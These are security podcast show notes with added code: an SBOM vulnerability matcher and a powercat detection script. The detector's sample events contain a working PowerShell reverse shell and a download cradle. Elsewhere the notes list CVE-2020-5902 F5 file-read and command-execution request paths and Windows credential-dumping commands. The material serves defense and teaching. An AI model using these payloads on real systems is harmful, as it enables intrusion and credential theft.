You mention in your BSidesSF talk 'how detailed it should be'. Can you give us an example of a high-level SBOM versus a more detailed one? Does it become a risk/reward effort concerning detail?
IoT device creators are working with their 3rd parties, who are working with their 3rd parties. Someone at home with a webcam cannot easily ask for an SBOM, so how do we convince device makers to want to ask for them?
How do you get your 3rd party that is a multi-national corporation to supply you with the information you need to ?
As we saw with RIPPLE20, many companies don't know what they have. How would an SBOM help keep another RIPPLE20 from happening?
Rob Graham's blog post highlighted that vulns like Heartbleed would not have been stopped. How does this help us track potential vulns?
Sharing information: what is the best way to share information about IoT components? Could an information sharing org (ISAC) track these more readily?
Vendor assessments: the vendor does not have an SBOM; are there specific questions we might ask that will allow an org to get more resolution into a potential vendor?
Interesting feedback from NTIA's RFC
Other SBOM types (CycloneDX, OpenBOM, FDA's CBOM). Companies are out there creating SBOMs, and other government agencies have SBOM implementations. How do we keep this from being the XKCD 927 issue? https://xkcd.com/927/
Non-US implementations of SBOM?
How do we get our companies to implement these?
An SBOM could easily be something that gives hackers a lot of information about your org, and depending on the information contained, I could see why you might not want to get super specific… Thoughts?
What is a 'bill of materials'? "A bill of materials (BOM) is a comprehensive inventory of the raw materials, assemblies, subassemblies, parts and components, as well as the quantities of each, needed to manufacture a product. In a nutshell, it is the complete list of all the items that are required to build a product."
SBOM - definition
As of November 2019, an estimated 126 different IoT platforms: https://www.postscapes.com/internet-of-things-platforms/
NTIA did an RFC on "promoting the sharing of Supply Chain Security Risk Information": https://www.ntia.gov/federal-register-notice/2020/request-comments-promoting-sharing-supply-chain-security-risk
https://www.ntia.gov/federal-register-notice/2020/comments-promoting-sharing-supply-chain-security-risk-information-0
Secure and Trusted Communications Network Act of 2019 (Act) - calling it "CBOM"
Other groups working on similar efforts:
FDA: https://www.fda.gov/media/119933/download
SPDX (Linux Foundation): https://spdx.org/licenses/
OpenBOM: https://medium.com/@openbom/friday-discussion-why-boms-are-essential-for-the-iot-platform-e2c4bd397afd
CycloneDX specification: https://github.com/CycloneDX/specification
FDA medical device cybersecurity: https://www.fda.gov/medical-devices/digital-health/cybersecurity
FDA guidance on the content of premarket submissions for software contained in medical devices: https://www.fda.gov/regulatory-information/search-fda-guidance-documents/guidance-content-premarket-submissions-software-contained-medical-devices
Medical device IR playbook (MITRE): https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf
Companies are helping to get a "CBOM" for devices: "It can take anywhere from six months to a year for a new medical device to get its 510(k) clearance from the FDA," said MedCrypt CEO Mike Kijewski in a news release. https://www.medicaldesignandoutsourcing.com/medcrypt-acquires-medisao-in-medtech-cybersecurity-deal/
Does an SBOM work for DevSecOps? https://cybersecurity.att.com/blogs/security-essentials/software-bill-of-materials-sbom-does-it-work-for-devsecops
Intoto software development: https://www.intotosystems.com/
510(k) process: https://www.drugwatch.com/fda/510k-clearance/
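The questions in both Allan Friedman episodes above ("How do you make an SBOM? What data formats make sharing easier?" and "How would an SBOM help keep another RIPPLE20 from happening?") come down to one thing: when an advisory lands, can you answer "are we shipping the affected version?" without opening every firmware image. The following is an added example, not code from NTIA, the CycloneDX project or the podcast. It assembles a minimal CycloneDX 1.2 JSON document (one of the formats listed above) with package-URL identifiers, then matches its components against an advisory list using [introduced, fixed) version ranges. The component inventory is constructed; the advisory list holds one real entry that the show notes mention, Heartbleed (CVE-2014-0160, OpenSSL 1.0.1 through 1.0.1f, fixed in 1.0.1g), and one placeholder, ADV-EXAMPLE-0001, which is not a real vulnerability.

```python
"""Build a minimal CycloneDX SBOM and ask it "are we shipping the affected version?"

Added example for the SBOM discussion above; it is not code from NTIA,
the CycloneDX project or the podcast. The component inventory is
constructed. The advisory list holds one real entry (Heartbleed,
CVE-2014-0160: OpenSSL 1.0.1 through 1.0.1f, fixed in 1.0.1g) and one
placeholder, ADV-EXAMPLE-0001, which is not a real vulnerability.
"""
import json
import re

# Constructed inventory for a firmware image: package-URL type, name, version.
COMPONENTS = [
    {"ptype": "generic", "name": "openssl", "version": "1.0.1f"},
    {"ptype": "generic", "name": "zlib", "version": "1.2.11"},
    {"ptype": "generic", "name": "libwidget", "version": "2.3.1"},
    {"ptype": "npm", "name": "left-pad", "version": "1.3.0"},
]

ADVISORIES = [
    # Real: Heartbleed.
    {"id": "CVE-2014-0160", "name": "openssl", "introduced": "1.0.1", "fixed": "1.0.1g"},
    # Constructed placeholder for a made-up library; not a real vulnerability.
    {"id": "ADV-EXAMPLE-0001", "name": "libwidget", "introduced": "2.0.0", "fixed": "2.3.1"},
]

# Constructed serial number; a real generator would use uuid.uuid4().
SERIAL = "urn:uuid:3e671687-395b-41f5-a30f-a58921a69b79"


def version_key(version):
    """Comparable key for versions like 1.2.11 or OpenSSL-style 1.0.1f.
    Numeric parts compare numerically and any trailing text compares as a
    string, so 1.0.1 < 1.0.1f < 1.0.1g < 1.0.2."""
    key = []
    for piece in re.split(r"[.\-]", version):
        number, suffix = re.match(r"(\d*)(.*)$", piece).groups()
        key.append((int(number) if number else 0, suffix))
    return tuple(key)


def purl(ptype, name, version):
    """package-URL: pkg:TYPE/NAME@VERSION (no namespace or qualifiers here)."""
    return "pkg:%s/%s@%s" % (ptype, name, version)


def build_sbom(components, serial=SERIAL):
    """Minimal CycloneDX 1.2 document as a dict ready for json.dumps."""
    return {
        "bomFormat": "CycloneDX",
        "specVersion": "1.2",
        "serialNumber": serial,
        "version": 1,
        "components": [
            {
                "type": "library",
                "name": c["name"],
                "version": c["version"],
                "purl": purl(c["ptype"], c["name"], c["version"]),
            }
            for c in components
        ],
    }


def to_json(sbom):
    return json.dumps(sbom, indent=2, sort_keys=True)


def from_json(text):
    return json.loads(text)


def affected_components(sbom, advisories):
    """Return (advisory id, purl) for every component inside an advisory's
    [introduced, fixed) range; the name match is deliberately simple."""
    hits = []
    for comp in sbom["components"]:
        found = version_key(comp["version"])
        for adv in advisories:
            if comp["name"] != adv["name"]:
                continue
            if version_key(adv["introduced"]) <= found < version_key(adv["fixed"]):
                hits.append((adv["id"], comp["purl"]))
    return hits


if __name__ == "__main__":
    sbom = build_sbom(COMPONENTS)
    print(to_json(sbom))
    for adv_id, component in affected_components(sbom, ADVISORIES):
        print("AFFECTED:", adv_id, component)
```

The match is on the bare component name, which is enough to show the idea but too loose for production: real tooling keys on the purl or a CPE and pulls ranges from a vulnerability feed rather than a hand-written list. The point relevant to the Rob Graham objection above stands either way: an SBOM does not stop the next Heartbleed, it turns "which of our products ship OpenSSL 1.0.1f?" from a weeks-long inventory exercise into a query.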
S2020 Ep 30: 2020-030-Mick Douglas, defenses against powercat, offsec tool release, SRUM logs, and more!
WISP.org donation page: https://wisporg.z2systems.com/np/clients/wisporg/donation.jsp
Mick Douglas (@bettersafetynet on Twitter)
Powercat, netcat in a PowerShell environment: https://github.com/besimorhino/powercat
The PowerShell boogeyman, how to defend against malicious PowerShell attacks: https://blog.rapid7.com/2018/09/27/the-powershell-boogeyman-how-to-defend-against-malicious-powershell-attacks/
Powercat, a PowerShell netcat: https://www.hackingarticles.in/powercat-a-powershell-netcat/
Defenses against powercat?
LOLBins: https://www.cynet.com/blog/what-are-lolbins-and-how-do-attackers-use-them-in-fileless-attacks/
Sigma ruleset (how to write Sigma rules): https://www.nextron-systems.com/2018/02/10/write-sigma-rules/#:~:text=Sigma%20is%20an%20open%20standard,grep%20on%20the%20command%20line.
Elastic bought Endgame: https://www.elastic.co/about/press/elastic-announces-intent-to-acquire-endgame
Thinking of a cybersecurity career? Read this: https://krebsonsecurity.com/2020/07/thinking-of-a-cybersecurity-career-read-this/
Twitter DM to @bettersafetynet: "Hey... I wanna talk about @hrbrmstr's tweet on the show tonight as well... https://twitter.com/hrbrmstr/status/1287442304593276929 My thinking is, if Cisco and others didn't try to intentionally downplay vulnerabilities by announcing them on a Friday, would we be more likely to patch sooner? Also, greater need for testing of patches to ensure that 80% of your workforce rely on that technology now. What's worse? Patching on a Friday evening (after several hours explaining the vuln to a manager), and then having it fuck something up so you're up at the crack of dawn Monday troubleshooting something missed Friday night because testing was rushed/not conducted because the CEO can't access email? I have thoughts; I've added this to the show note Google Doc."
Nmap PoC script for CVE-2020-3452? https://www.reddit.com/r/netsec/comments/hwaj6f/nmap_script_fot_cve20203452/
Embargoed vulns…
Getting management buy-in to patch
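"Defenses against powercat?" is mostly a logging question: with PowerShell script block logging (Event ID 4104) and process creation auditing with command lines (Event ID 4688) turned on, the tool leaves recognizable text behind. The following is an added example, not code from Mick Douglas or the powercat project: a small Sigma-style matcher run over constructed event records. It looks for three things, the download cradle that fetches powercat.ps1, powercat's own switches (-c host -p port -e cmd, -l -p port), and the .NET socket calls any PowerShell netcat clone has to make (System.Net.Sockets.TcpClient or TcpListener plus GetStream), which still fire when the script has been renamed. It also decodes the base64/UTF-16LE payload of -EncodedCommand in a 4688 command line before matching. All events, the field names as shown, and the base64 payload (built at import time) are constructed for the demonstration.

```python
"""Flag powercat-style PowerShell activity in Windows event log records.

Added example for the "defenses against powercat" discussion above; it is
not code from Mick Douglas or the powercat project. Needs script block
logging (Event ID 4104) and process creation auditing with command line
(Event ID 4688). All events below are constructed; the base64 payload is
built at import time.
"""
import base64
import re

# Sigma-like rules: a rule fires when every group has at least one of its
# substrings present, case-insensitively (Sigma `contains|all` across
# groups, `contains` within a group).
RULES = [
    {"title": "powercat download cradle",
     "groups": [["powercat"],
                ["DownloadString", "DownloadFile", "Invoke-WebRequest", "iwr "]]},
    {"title": "powercat bind/reverse shell switches",
     "groups": [["powercat"],
                ["-e cmd", "-e powershell", "-l -p ", "-c "]]},
    {"title": "powercat-style shell over raw .NET socket",
     "groups": [["System.Net.Sockets.TcpClient", "System.Net.Sockets.TcpListener"],
                ["GetStream(", "AcceptTcpClient("],
                ["iex ", "Invoke-Expression", "cmd.exe", "powershell"]]},
]

# powershell.exe -EncodedCommand takes base64 of UTF-16LE text; PowerShell
# accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

ENCODED = base64.b64encode(
    "powercat -c 10.0.0.5 -p 443 -e cmd".encode("utf-16-le")).decode("ascii")

# Constructed sample events, fields as exported from the Windows event log.
EVENTS = [
    {"EventID": 4104, "ScriptBlockText":
     "IEX (New-Object System.Net.Webclient).DownloadString("
     "'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "powercat -c 10.0.0.5 -p 443 -e cmd"},
    {"EventID": 4104, "ScriptBlockText":
     "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.5',443);"
     "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
     "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){"
     "$data = (New-Object System.Text.ASCIIEncoding).GetString($bytes,0,$i);"
     "$sendback = (iex $data 2>&1 | Out-String)}"},
    {"EventID": 4104, "ScriptBlockText":
     "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"},
    {"EventID": 4688, "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
]


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or '' if there is none."""
    match = ENCODED_RE.search(command_line)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return ""


def event_text(event):
    """Text to match for one event: the script block, or the command line
    followed by its decoded -EncodedCommand payload."""
    if event.get("EventID") == 4104:
        return event.get("ScriptBlockText", "")
    if event.get("EventID") == 4688:
        cmd = event.get("CommandLine", "")
        return cmd + "\n" + decode_encoded_command(cmd)
    return ""


def rule_matches(rule, text):
    lowered = text.lower()
    return all(any(needle.lower() in lowered for needle in group)
               for group in rule["groups"])


def scan(events, rules=RULES):
    """Return (rule title, event index) for every rule that fires."""
    alerts = []
    for index, event in enumerate(events):
        text = event_text(event)
        for rule in rules:
            if rule_matches(rule, text):
                alerts.append((rule["title"], index))
    return alerts


if __name__ == "__main__":
    for title, index in scan(EVENTS):
        print("ALERT event[%d] (ID %s): %s" % (index, EVENTS[index]["EventID"], title))
```

Substring rules like these are cheap to evade with string concatenation or -f formatting, which is why the third rule keys on the socket behaviour rather than the tool name, and why 4104 is the more valuable source: script block logging records the block as PowerShell actually executes it, after the de-obfuscation has happened. Command-line logging for 4688 has to be enabled separately through the "Include command line in process creation events" audit policy setting, or the encoded payload never reaches the log.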
2020-029- Brad Spengler, Linux kernel security in the past 10 years, software dev practices in Linux, WISP.org PSA
WISP.org PSA at 35m56s - 37m19s
Agenda: Bio/background; Why are you here (topic discussion); What is the Linux Security Summit North America
https://grsecurity.net/
Questions from the meeting invite:
This only affects people who want to use a custom kernel, correct? This doesn't affect you if you are running bog-standard Linux (Debian, Gentoo, Ubuntu), right?
What options do people have in cloud environments?
Does the use of microservices make grsecurity less worthwhile?
You mentioned ARM64 processors in your first slide as making significant security functionality strides. With Apple and Microsoft going to ARM-based processors, what are some things you feel need to be added to the kernel to shore up Linux for ARM, since some purists enjoy an Apple device with Linux on it?
https://www.youtube.com/watch?v=F_Kza6fdkSU - YouTube video
https://grsecurity.net/10_years_of_linux_security.pdf -- PDF slides
https://lwn.net/Articles/569635/ - Definition of KASLR
LTS kernels moved from 2 years to 6 years - why? 6 years is pretty much "FOREVER" in software development. Patches get harder to backport, or worse, could introduce new vulnerabilities.
Project Treble: https://www.computerworld.com/article/3306443/what-is-project-treble-android-upgrade-fix-explained.html
LTSI: https://ltsi.linuxfoundation.org/
4.4 XLTS is available until Feb 2022 - if fixes and all bugs haven't been backported (1,250 security fixes aren't in the latest stable 4.4 kernel), what are the "safe" kernels?
Has anything changed since the presentation you gave earlier in July 2020?
Syzkaller: Let's discuss Slide 27 (what are those terms?) "Is it improving code quality, or is it making people lazier and more reliant on a tool to check code?" In the Slide 29 audio, you mention that you use Syzkaller… why do you use it?
Exploitation Trends: Attackers still don't care about whether a vulnerability has a CVE assigned or not. Don't many vulnerabilities require some work to get to the kernel? And why should they work to get to the kernel?
https://www.bleepingcomputer.com/news/security/rewards-of-up-to-500-000-offered-for-freebsd-openbsd-netbsd-linux-zero-days/ - 500K IF the kernel vuln affects major distros (CentOS, Ubuntu)
https://resources.whitesourcesoftware.com/blog-whitesource/top-10-linux-kernel-vulnerabilities
Why is the Zerodium payout for kernel vulns lower than for application vulns?
Would it be fair to say that getting root/persistence is all that matters and you don't need to worry about the kernel to do so?
Many of the new security features are protecting against bad programming practices? So by adding all these things, who are you securing systems against? Bad actors, or devs who employ poor coding measures?
Why do you think we see lower adoption rates of security
Problem solving: Halvar Flake: http://addxorrol.blogspot.com/2020/03/before-you-ship-security-mitigation.html
If we have time… Threat models in a kernel: Where do they go in the development lifecycle? If kernel dev is an open environment, what precipitates the need for a kernel mitigation threat model? Is there an example somewhere that we can see? What is the format? Methodology?
Do you think static code analysis of the kernel is worthwhile at all?
Absolutely! We do a lot of it, including via the analysis resulting from compiling with LLVM, as well as via specific static analysis GCC plugins of our own.
OK, what about the large amount of false positives the analyzers generate? Do you get around that with your custom plugins? Also, do you use the analyzers included with Clang and GCC v.10 or 3rd-party products?
That's usually a property of the analysis itself -- some can have large false positive issues, others not. Ideally we try to limit that for the plugins we write (we just recently added one helpful for some kind of NULL ptr dereferences this week).
My understanding is the public now also has access to the Coverity reports for the kernel?
As far as GCC versions, yes we test with all versions from 4.5 to 10.
What do you think of the proposed XPFO patch? https://lwn.net/Articles/784839/
The performance profile is a big problem, and it doesn't address that the same attack can be performed in a different way that it wouldn't handle (that limitation is also mentioned in the original paper). So we haven't invested in it at all with our own work.
How about git SHA-256 security measures?
Not my domain of expertise, but sounds like a good idea.
What is the status of KASLR on non-Intel architectures? ARMv7/v8?
It exists there as well, and is shipped in Android. It's also recently been added for PowerPC.
What dynamic analysis/testing tools do you use for the kernel?
We have a couple racks of hardware, including some new AMD EPYC2 systems dedicated entirely to testing and syzkaller fuzzing. We have syzkaller in place (along with backports of functionality to improve its functionality/coverage) for all kernels we support, as well as a good mix of physical/VM systems for major distros, and automated build/boot/functionality/regressio
2020-028-Shlomi Oberman, RIPPLE20, supply chain security discussion, software bill of materials
Whitepaper: https://www.jsof-tech.com/ripple20/
[blog] Build your own custom TCP/IP stack: https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/
Another custom TCP/IP stack: https://github.com/tass-belgium/picotcp
RIPPLE 20 Whitepaper: https://drive.google.com/file/d/1d3NNVCRPVFk0-V0HUO5CxWWVn9pYIvmF/view?usp=sharing
Agenda:
Part 1: Background on the report
Why is it called RIPPLE20? What's the RIPPLE about?
Communications with Treck (and its Japanese counterpart). Were you surprised about the reaction? Positive or negative?
Types of systems affected? IoT, embedded systems, SCADA
What precipitated the research?
What difficulties did you face in finding these vulns? Deadlines?
What tools were used for analysis? (I think you mentioned Forescout --brbr)
What kind of extensibility are we talking about? TCP sizes?
What did JSOF gain by doing this?
What were the initial benefits of using the TCP/IP stack? Speed? Size?
Do these vulns affect other TCP/IP stacks?
Did Treck give you access to source? Any specific requirements set by Treck? Any items that were off-limits?
Updates since the report was released?
Are your vulns such that they can be detected online?
Part 2: Supply chain issues
What should companies do when they don't know what's in their own tech stack?
https://csrc.nist.gov/CSRC/media/Projects/Supply-Chain-Risk-Management/documents/briefings/Workshop-Brief-on-Cyber-Supply-Chain-Best-Practices.pdf
Software bill of materials: https://en.wikipedia.org/wiki/Software_bill_of_materials
The PicoTCP link above does not release all code, because they use binary blobs that make proper code review next to impossible: "Unfortunately we can't release all the code, a.o. because some parts depend on code or binaries that aren't GPL compatible, some parts were developed under a commercial contract, and some consist of very rough proof-of-concept code. If you want to know more about the availability under the commercial license, or the possibility of using our expert services for porting or driver development, feel free to contact us at [email protected]."
BLoBs = https://en.wikipedia.org/wiki/Proprietary_device_driver
Vendor Contact:
How many organizations are affected by these vulnerabilities? Are some devices and systems more vulnerable than others? How many are you still investigating to see if they are affected?
What's the initial email look like when you tell a company "you're vulnerable to X"? Who are you dealing with initially?
What is your delivery when you're routed to non-technical people? How did you tailor your initial response when you learned of the position of the person?
Lessons Learned: What would you have done differently next time? Any additional tooling that you'd have used?
BlackHat talk: 05 August
What should companies do to reduce or mitigate the chances of the types of vulnerabilities found by your org?
https://cambridgewirelessblog.wordpress.com/2016/05/18/supply-chain-security-and-compliance-for-embedded-devices-iot/
https://blog.shi.com/solutions/embedded-hardware-supply-chain-attacks-embedded-system-attacks-how-to-stay-safe/
http://www.intrinsic-id.com/wp-content/uploads/2018/02/2016-A-Platform-Solution-for-Secure-Supply-Chain-and-Chip-Cycle-Management-Computer-Volume-49-Issue-8-Aug.-2016-Joseph-P.-Skudlarek-Tom-Katsioulas-Michael-Chen-%E2%80%93-Mentor-Graphics..pdf
https://www.supplychainservices.com/blog/major-security-risks-windows-embedded-users
https://www.bbc.com/news/business-32716802#:~:text=Japanese%20car%20giants%20Toyota%20and,March%202003%20and%20November%202007.
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel!
Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
2020-027-RIPPLE20 Report, supply chain security, responsible disclosure, software development, and vendor care.
2020-026- WISP PSA, PAN-OS vuln redux, F5 has a bad weekend, vuln scoring, Twitter advice, and more!
1st: WISP.org PSA from Rachel Tobac (@racheltobac) & @wisporg talking about #shareTheMicInCyber
#SAML PAN-OS: https://twitter.com/RyanLNewington/status/1278074919092289537
F5 vulnerability: https://www.wired.com/story/f5-big-ip-networking-vulnerability/
https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/
F5 Mitigation (if patching is not immediately possible): https://twitter.com/TeamAresSec/status/1280590730684256258 - Redirect 404 /
https://twitter.com/wugeej/status/1280008779359125504 - Tweet with PoC for the LFI and RCE
F5 BIG-IP CVE-2020-5902 LFI and RCE:
LFI: https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd or /etc/hosts or /config/bigip.license
RCE: https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
How to cope in a no-win situation: https://twitter.com/datSecuritychic/status/1280527467569008640
Semicolon in bash: https://docstore.mik.ua/orelly/unix3/upt/ch28_16.htm#:~:text=When%20the%20shell%20sees%20a,once%20at%20a%20single%20prompt.
2020-025-Cognizant breach, maze ransomware, PAN-OS CVE 2020-2021, SAML authentication walkthrough
Thank you to Marcus Carey for his excellent guidance and leadership this week.
Cognizant breach: https://www.ehackingnews.com/2020/06/cognizant-reveals-employees-data.html
Maze ransomware write-ups: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
https://docs.paloaltonetworks.com/pan-os/9-0/pan-os-admin/authentication/authentication-types/saml
PAN-OS CVE-2020-2021 - We have been made aware of a serious issue with SAML on Palo Alto Networks PAN-OS. We strongly encourage our customers to upgrade to one of the following versions: PAN-OS 8.1.15, PAN-OS 9.0.9, PAN-OS 9.1.3 and greater. This is a critical vulnerability with the only mitigation being to either turn OFF SAML or to upgrade the PAN-OS. A CVE will be released on Monday :: CVE-2020-2021
https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language
2020-024-Bit of news, Ripple20 vulns, IoT Security, windows error codes, captchas used for evil, Marine Momma
https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/
https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4657
https://www.blumira.com/logmira-windows-logging-policies-for-better-threat-detection/
How would we map this against the MITRE matrix? Are there any MITRE attack types that are so similar that one attack can be two different things in the matrix?
https://www.us-cert.gov/ics/advisories/icsa-20-168-01
https://www.zdnet.com/article/ripple20-vulnerabilities-will-haunt-the-iot-landscape-for-years-to-come/
https://www.tenable.com/blog/cve-2020-11896-cve-2020-11897-cve-2020-11901-ripple20-zero-day-vulnerabilities-in-treck-tcpip
https://arstechnica.com/information-technology/2020/06/to-evade-detection-hackers-are-requiring-targets-to-complete-captchas/
2020-023-James Nelson from Illumio, cyber resilience, business continuity
James Nelson, VP of Infosec, Illumio
How has COVID-19 changed cybersecurity?
Why is cyber resilience especially important now?
What are the most important steps to ensure cyber-resiliency?
How do you talk to business leaders about investing in cybersecurity to boost resiliency?
The best way for organizations to keep their 'crown jewels' secure is adopting a Zero Trust mindset. Organizations need to take advantage of adaptive security infrastructure that can scale to meet current and future organizational needs, and take steps to ensure even third-party hosted data is policy compliant.
Most CISOs don't talk to the board all the time, so they don't understand that this is the conversation they want to have. Make sure that the security team's spokesperson has an intelligent plan that shows how wrong things could go. Showing how money is directly connected to mitigating the risks is vital to getting the funding needed, as is showing why an increase in spend corresponds to a decrease in risk.
Cyber-Resilience: https://en.wikipedia.org/wiki/Cyber_resilience
https://en.wikipedia.org/wiki/Business_continuity_planning#Resilience
https://www.darkreading.com/cloud/cyber-resiliency-cloud-and-the-evolving-role-of-the-firewall/a/d-id/1337206
Doug Barth and Evan Gilman - https://brakeingsecurity.com/2017-017-zero_trust_networking_with_doug_barth
Part 1 with Masha Sedova: https://traffic.libsyn.com/secure/brakeingsecurity/Masha_sedova-elevate_security-profiled-education-phishing-part1.mp3
Part 2: https://traffic.libsyn.com/secure/brakeingsecurity/2020-019-masha_sedova-privacy-human_behavior-phishing-customized_training.mp3
https://www.helpnetsecurity.com/2017/08/24/assume-breach-world/
Key concepts:
Visibility into your environment
Controls necessary to repel attackers
Architecture of the network to create chokepoints (east/west, north/south isolation)
Threat modeling and regular threat assessment
Mechanisms to allow for rapid response
How long will current security controls hold a determined attacker at bay?
Business-wide Risk Management response can often determine resiliency in a Crisis/Breach situation.
Cyber-Resilience Framework (per NIST: https://csrc.nist.gov/publications/detail/sp/800-160/vol-2/final)
What does "cyber resiliency" mean to the organization? To the department? To the individual? And what of the mission or business process the system is intended to support?
Which cyber resiliency objectives are most important to a given stakeholder?
To what degree can each cyber resiliency objective be achieved?
How quickly and cost-effectively can each cyber resiliency objective be achieved?
With what degree of confidence or trust can each cyber resiliency objective be achieved?
(What do we as security people do to ensure that all of these are properly answered? --brbr)
Architecture of systems: Depending on the age of our information systems and technology stacks, cruft builds up or one-off systems are set up and forgotten. We (the infosec industry) talk about shifting security left in a DevOps environment to ensure security gets put in, but what should we do as an organization when we think about adding systems in terms of cyber-resilience? (It would seem that resilience may also be tied to the security or functionality in a piece of hardware and software. Proper understanding of all the systems' capabilities/settings/options would be essential for drafting responses --brbr)
Some related and tangential suggestions for ideas/comments/themes/topics in case you feel like any fit into the conversation:
Comparison of security to the human immune system.
Does resilience (i.e., assume breach) imply there are failures you can recover from, yet other, existential risks you need to avoid? And what does that mean in practice?
How do you define "most valuable assets"? Value vs. obligations vs. ...?
Does a compliance mindset help or hinder resilience, and vice versa?
Referring back to a prior show, how does the human element contribute to resilience?
The NIST doc makes a point that resilience only has meaning when it works across a system; how does this idea impact the cost of entry? And is there a tipping point for resilience?
Another point made is that speed should be viewed as an advantage. Is there an application of the OODA loop concept to resilience, then?
Cyber resilience resonates in other areas: pandemics, natural disasters, and geo-political stressors could impact supply chain, workforce effectiveness, and other areas. Ransomware (which is cyber, but has other, knock-on effects).
2020-022-Andrew Shikiar, FIDO Alliance, removing password from IoT, and discussing FIDO implementation
Andrew Shikiar, executive director and CMO of the FIDO (Fast IDentity Online) Alliance.
What is FIDO? "open industry association launched in February 2013 whose mission is to develop and promote authentication standards that help reduce the world's over-reliance on passwords. FIDO addresses the lack of interoperability among strong authentication devices and reduces the problems users face creating and remembering multiple usernames and passwords."
Did any one event precipitate creation of the FIDO alliance?
UAF = https://fidoalliance.org/specs/fido-uaf-v1.2-rd-20171128/fido-uaf-protocol-v1.2-rd-20171128.html
U2F = https://en.wikipedia.org/wiki/Universal_2nd_Factor (yubikeys, tokens)
https://landing.google.com/advancedprotection/
FIDO supports biometrics - https://www.biometricupdate.com/202002/how-fido-based-biometric-technology-clears-up-the-iot-authentication-mess
FIDO certified software and companies: https://fidoalliance.org/fido-certified-showcase/
IBM: https://www.ibm.com/blogs/sweeden/fido2-conformance-why-its-a-big-deal/
Digital Identity Guidelines: Authentication and Lifecycle Management - digital ID framework; NIST guidelines that FIDO meets: https://pages.nist.gov/800-63-3/sp800-63b.html#sec5
https://fidoalliance.org/certification/authenticator-certification-levels/
https://github.com/herrjemand/awesome-webauthn
https://fidoalliance.org/content/case-study/
https://loginwithfido.com/provider/
From a threat modeling perspective, how does '2FA' occur when the authenticating method and the browser are on the same device?
Consumer education initiative: https://loginwithfido.com/
IoT Devices - https://fidoalliance.org/internet-of-things/
https://blog.techdesign.com/fido-authentication-to-secure-iot-devices/
For Developers: https://fidoalliance.org/developers/ or https://webauthn.io/ - dev information about WebAuthn
https://fidoalliance.org/events/ - upcoming webinars for FIDO related topics
NTT DOCOMO introduces passwordless authentication for d ACCOUNT
https://groups.google.com/a/fidoalliance.org/forum/#!forum/fido-dev
2020-021- Derek Rook, redteam tactics, blue/redteam comms, and detection of testing
**If Derek told you about us at SANS, send a DM to @brakeSec or email [email protected] for an invite to our slack**
OSCP/HtB/VulnHub is a game... designed to have a tester find a specific nugget of information to pivot or gain access to greater power on the system. Far different in the 'real' world.
Privilege escalation in Windows: *as of June 2020, many of these items still work, may not work completely in the future* *even so, many of these may not work if other mitigating controls are in place*
PENTEST METHODOLOGY:
PTES - http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
OSSTMM - https://www.isecom.org/OSSTMM.3.pdf
Redteam methodology: https://www.synopsys.com/glossary/what-is-red-teaming.html
https://www.fuzzysecurity.com/tutorials/16.html
https://medium.com/@Shorty420/enumerating-ad-98e0821c4c78
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
Enumerate the machine:
Services
Network connections
Users
Logins
Domains
Files
Software installed (putty, git, MSO, etc) *older software may install with improper permissions*
Service paths (along with the users services are run as)
Windows Features (WSL, SSH, etc)
Patch level (Build 1703, etc)
Wifi networks and passwords (netsh wlan show profile <SSID> key=clear)
Powershell history
Bash History (if WSL is used)
Incognito tokens
Stored credentials (cmdkey /list)
Powershell transcripts (search text files for "Windows PowerShell transcript start")
Context for above: Understand how the users make use of the system, and how they connect to other systems; follow those paths to find lateral movement, misconfigurations, etc. Each new system or user will provide further information to loot or avenues to explore.
Linux EoP: https://guif.re/linuxeop
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Enumeration: Mostly the same as above
Bash history or profile files
Writable scripts (tampering with paths or environment variables)
Setuid/Setgid binaries
Sticky bit directories
Crontabs
Email spools
World writable/readable files
.ssh config files (keys, active sessions)
